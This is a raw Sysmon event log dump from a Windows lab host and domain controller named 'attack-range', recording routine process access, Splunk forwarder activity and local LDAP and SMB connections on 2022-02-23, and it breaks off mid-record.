10341000x8000000000000000215223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0FA5-6216-2004-000000003902}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FA5-6216-2004-000000003902}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.849{4F8D34B0-0FA5-6216-2004-000000003902}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.816{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.723{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46C45C4A76C5BD7F8061EBA0126C33AF,SHA256=639CA5596AA114AEDCEA2D3CDC2E05DE87CE5B2275526B972E3D9F6A30881804,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:43.951{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53322-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:43.951{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53322-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:43.940{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53321-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:43.940{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53321-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:45.571{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC7DD057DBF14CA0C43BC5EF0B3E3B84,SHA256=ECA1EBCC2F20900D46B184CE7C374FF3854D65FD37199209997CF2771D0173F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:45.461{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D9CA55C77771271847344E26DAF791F6,SHA256=0D9E403DF018ABFC1343AA73B7B6425E26BB7ABF1A50A1E4814FDB5402F57A1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:45.461{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2877F4DAA9640637325181459920ACCB,SHA256=D5C078EA32135E2AA04936E715576AE897AC22B99296C078AE2870E800BE8491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:45.148{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80CCF62E84DD7AB8A38804FD94D71F93,SHA256=A389E8A578F55AD51C36CF9D38935670245C86B1F5B0E10AD97863C059A291D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FA5-6216-1F04-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0FA5-6216-1F04-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FA5-6216-1F04-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.176{4F8D34B0-0FA5-6216-1F04-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:46.754{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0C137FFFFA2398A6C34FF26B9297903,SHA256=B0A7381BE438E9159DD16D7FEEFA6BC3BC09E6A61242A591400E1770029214F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:44.050{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53323-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000286320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:44.050{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53323-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000286319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:46.148{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=517D35300864CEA412DEAA5004CC7204,SHA256=E9B1048D7FF8ABFFD6CE15E45930A8FA041BE0F6CE491B636A9C76E2D70FAC70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:46.410{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E80F6B66B9F1C037D759BE440DF5ADE,SHA256=30F72A6C58E0F5BDCED6F62E27CDB4D5F5A68FE7BF46EFCC07302FBFCF0AA412,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:46.410{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 